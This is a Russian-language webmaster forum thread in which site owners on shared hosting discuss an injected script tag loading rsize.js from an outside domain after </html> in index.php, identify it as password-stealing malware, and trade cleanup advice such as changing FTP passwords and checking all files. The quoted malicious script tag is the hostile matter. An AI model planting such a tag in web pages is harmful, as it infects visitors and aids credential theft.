К списку форумов К списку тем
Регистрация    Правила    Главная форума    Поиск   
Имя: Пароль:
Рекомендовать в новости

rsize.js

Гость
0 - 22.11.2012 - 10:25
В сгененированном коде сайта после </html>
появился вот такой скрипт
<script src="http://kinoshkaxa.changeip.name/rsize.js"></script>
Что за зверь такой ?



Гость
1 - 22.11.2012 - 11:28
С большой долей вероятности - заражение
Гость
2 - 22.11.2012 - 13:51
каким то боком проифреймили сайт, но логи админки малчат, как и все другие логи. Погуглил слегка, смотрю многие (чужие) сайты заражены им.
Гость
3 - 22.11.2012 - 13:53
Сайт на VDS/VPS/Shared hosting? Путей проифреймить очень много.
Гость
4 - 22.11.2012 - 13:58
Shared hosting на Sweb
Гость
5 - 22.11.2012 - 14:04
Тогда путей ещё больше. Для начала найти вредоносный код в php и inc файлах и удалить его. перед этим сменить пароли на админку и ftp и никогда больше не сохранять их в клиентском софте.
Но и это может не помочь - могут через соседей поиметь или через дырки в вашем сайте.
Гость
6 - 22.11.2012 - 14:24
Да код то я удалил, он сидел только в стартовом index.php (жаль не записал последнее время изменения файла). Теперь буду проверять его регулярно, по времени изменения index.php проще будет искать потом.
Гость
7 - 12.05.2013 - 02:20
Цитата:
Сообщение от aquadeZign Посмотреть сообщение
Да код то я удалил, он сидел только в стартовом index.php (жаль не записал последнее время изменения файла). Теперь буду проверять его регулярно, по времени изменения index.php проще будет искать потом.
Этот скрипт представляет собой вредоносный код
Назначение: ворует пароли и аккаунты, сохраненные в Менеджерах паролей, заражает сайты, автоматически прописывая в index.html и в index.php свои скрипты. Скрипты разные. Как его удалить и что и где проверять подробно написано здесь http://www.spravkasleavka.ru/interne...j-rsizejs.html
Гость
8 - 12.05.2013 - 19:59
7-validero >
а как он появляется (система/пхп-дыры/шаблоны) там не сказано?
Гость
9 - 13.05.2013 - 13:48
Цитата:
Сообщение от Гавайские субтитры Посмотреть сообщение
7-validero &gt; а как он появляется (система/пхп-дыры/шаблоны) там не сказано?
Через ваш комп. Подхватываете у себя, он на вашем компе засканил сохр.пароли и вошел к вам на сайт (100% уверенности нет - не я его писал и пользовался :)))) Написано в этом заголовке Как могло произойти заражение
Гость
10 - 13.05.2013 - 17:19
Цитата:
Сообщение от validero Посмотреть сообщение
Подхватываете у себя, он на вашем компе засканил сохр.пароли и вошел к вам на сайт
обождите, он же вроде с ифрейма сканит.
Надо искать, как он влез на сайт. Сам фрейм.
Пишите на хостинг или чо оно у вас там. Отслеживайте.
Гость
11 - 13.05.2013 - 19:33
Такая же проблема произошла. Я тоже хостюсь на sweb - два сайта. Два моих индексных файла изменили чудесной функцией под названием collectnewss(). Нашли Касперским, пожаловались 1.5 недели назад
Гость
12 - 13.05.2013 - 19:37
Причем мои копии не тронуты с прошлого года. Т.е. возможен вариант через соседей.
Гость
13 - 16.05.2013 - 16:45
Цитата:
Сообщение от Гавайские субтитры Посмотреть сообщение
Цитата: Сообщение от validero Подхватываете у себя, он на вашем компе засканил сохр.пароли и вошел к вам на сайт обождите, он же вроде с ифрейма сканит. Надо искать, как он влез на сайт. Сам фрейм. Пишите на хостинг или чо оно у вас там. Отслеживайте.
Ну вот кусок цитаты из той статьи: "...При переходе на ваш сайт, пользователь перенаправляется к злоумышленнику и там заражается.
2. Еще, бытует мнение, что можно заразиться от хостинга, на котором..."
1 Разве это не ифрейм?
2 Как троянские проги попадают в комп?
2 Там уже неделю как ничего нет. Зачем писать на хостинг?

Вы поэтому стесняетесь переходить? - Боитесь заразиться?
Хорошо. Вот предыстория того, что было:
8го вечером подхватил. Всю ночь чистил. 9го мая, когда проснулся, Яндекс уже поздравил с днем победы над вредоносным кодом и снял опалу. (Повезло) Сегодн 16е — пока тихо. Проверял 3 часа назад. Основные действия, которые обычно не упомянуты:
На FTP-сервере поднимитесь на уровень выше и пересмотрите всю папку webspace.Там перепроверьте все. Почистите вр.коды в https протоколах. Если будут попадаться файлы index.html~ в них тоже прописан скрипт после </html>. Если на сервере несколько сайтов — чистите все.
Все остальные действия борьбы с этой заразой, которые я применял, подробно описаны здесь http://www.spravkasleavka.ru/interne...j-rsizejs.html
Гость
14 - 16.05.2013 - 17:05
Чтобы узнать от соседей заражение или нет - надо, первым делом, поменять пароль на FTP-сервере (особенно если вы пользуетесь FileZilla Client) и больше не хранить его в менеджере паролей а вводить вручную при каждом заходе. Потом вычистить все, что принадлежит вам на хостинге. Если вновь появиться, тогда смело предполагать, что хостинг был заражен и заражение произошло через соседей. Логично?


К списку вопросов






Copyright ©, Все права защищены